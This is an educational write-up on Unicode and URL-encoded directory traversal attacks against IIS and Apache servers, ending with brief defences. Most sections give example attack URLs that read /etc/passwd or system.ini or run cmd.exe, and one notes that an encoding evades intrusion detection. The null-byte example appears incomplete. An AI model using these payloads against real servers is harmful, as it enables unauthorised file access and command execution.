Unicode Directory Traversal Attack
Preface
The reason I research about this topic is to have a strong understanding about Unicode Directory Traversal Attack and to know what are the techniques the attacker can do to obfuscate the attack.
Introduction
Manipulation of URL in such a way that can access restricted files by backtracking through a computer's directories. Any device or application that used an HTTP based interface is potentially vulnerable to Directory Traversal Attack.
Most of web servers have restriction to a specific portion of the filesystem, typically called "root directory" in which the users are confined.
For Linux/Unix, the apache document root directory is by default in the line:
DocumentRoot "/var/www/html"
For Windows, the IIS default document root directory is in:
c:\Inetpub\wwwroot
Depending on how the web server is setup the attacker will execute commands that can step out of the root directory and access other parts of the file system that can lead to a full compromise.
What is Directory Traversal Attack?
Directory Traversal also known as Path Traversal or dot dot slash attack (../) is an HTTP exploit which allow attackers to access restricted directories/files, view data and execute commands outside of the web server's root directory. This vulnerability can exist either in the web server software itself like apache/IIS or in the web application code by taking advantage of improper handling of user supplied input that may allow to execute arbitrary commands.
The main objectives of this attack is to have access to a file or program that is not intended to be accessible on the web server.
How does it work?
In order to perform a directory traversal attack, an attacker needs is a web browser and constructing a URL that would navigate to desired folder in the same drive. This can be achieved using Unicode character representations of dot("."), forward slash("/") and backslash("\"). According to RFC 2396 URI may be encoded using the percent sign (%) and hexadecimal characters.
Different type of Unicode encoding.
1. Hex Encoding - The simplest method of encoding a URL in IIS and Apache, consisting of the percent character "%" followed by the ASCII equivalent in hexadecimal digits.
%2e%2e%2f becomes ../ on the first decoding
2. Double Percent Hex Encoding - This encoding is supported by Microsoft IIS. The first percent is encoded using hex encoding followed by the hexadecimal byte value to be encoded.
%252e %252e %252f becomes "%2e %2e %2f" on the first decoding and "../" on the second decoding.
3. Double Nibble Hex Encoding - This encoding is supported by Microsoft IIS, each hexadecimal digit is encoded using the standard hex encoding.
Now we start with %%32%65 %%32%65 %%32%66 which becomes %2e %2e %2f on its first decoding and ../ on its second decoding.
Attack : http://server.com/scripts/%%32%65%%32%65%%32%66/Windows/System32/cmd.exe?/c+dir+c:\
4. First Nibble Hex Encoding - This encoding is supported by Microsoft IIS, only the first nibble is encoded in the following example :
%%32e %%32e %%32f becomes %2e %2e %2f on its first decoding and ../ on its second decoding
Attack : http://www.victim.com/userdata.php?file=%%32e%%32e%%32f%%32e%%32e%%32f%%32e%%32e%%32fwinnt/system32/cmd.exe?/c+dir
5. Second Nibble Hex Encoding - This encoding is supported by Microsoft IIS, same with first nibble hex encoding, the only difference is that the second hexadecimal digit is encoded.
%2%65 %2%65 %2%66 becomes %2e %2e %2f and ../ on its second decoding.
Attack : http://www.victim.com/shows.asp?view=%2%65%2%65%2%66%2%65%2%65%2%66%2%65%2%65%2%66Windows/system.ini
6. Microsoft %u Encoding - Microsoft IIS server supports a non-standard method of encoding web requests, known as '%u' encoding. Because %u method is non-standard, most network intrusion detection systems may not detect attacks encoded using this method.
URL requests in a format that uses "%uXXXX" where "XXXX" represent hexadecimal for example %u002e %u002e %u002f becomes ../
Attack : http://www.victim.com/userdata.php?file=%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002fetc/passwd
7. Null Byte Encoding - an evasion technique effective againt application developed using C based programming languages. When a URL-encoded null byte it will treated as the end of the string.
(, or 0x00 in hex)
Normal : http://www.victim.com/userdata.php?file=mydata.dat
Attack : http://www.victim.com/userdata.php?file=../../../etc/passwd
How do I protect?
- Apply the most up-to-date security patches
- Setup the web root directory on a non-system partition
- Any user input must be filter
References
http://en.wikipedia.org/wiki/Directory_traversal
http://www.imperva.com/resources/glossary/directory_traversal.html
http://www.acunetix.com/websitesecurity/directory-traversal.htm
http://www.securityfocus.com/bid/1806/exploit
http://www.owasp.org/index.php/Path_Traversal
http://www.webappsec.org/projects/threat/classes/path_traversal.shtml
http://www.mysecurecyberspace.com/encyclopedia/index/directory-traversal-attack.html
http://www.ietf.org/rfc/rfc2396.txt
http://www.cert.org/advisories/CA-2001-12.html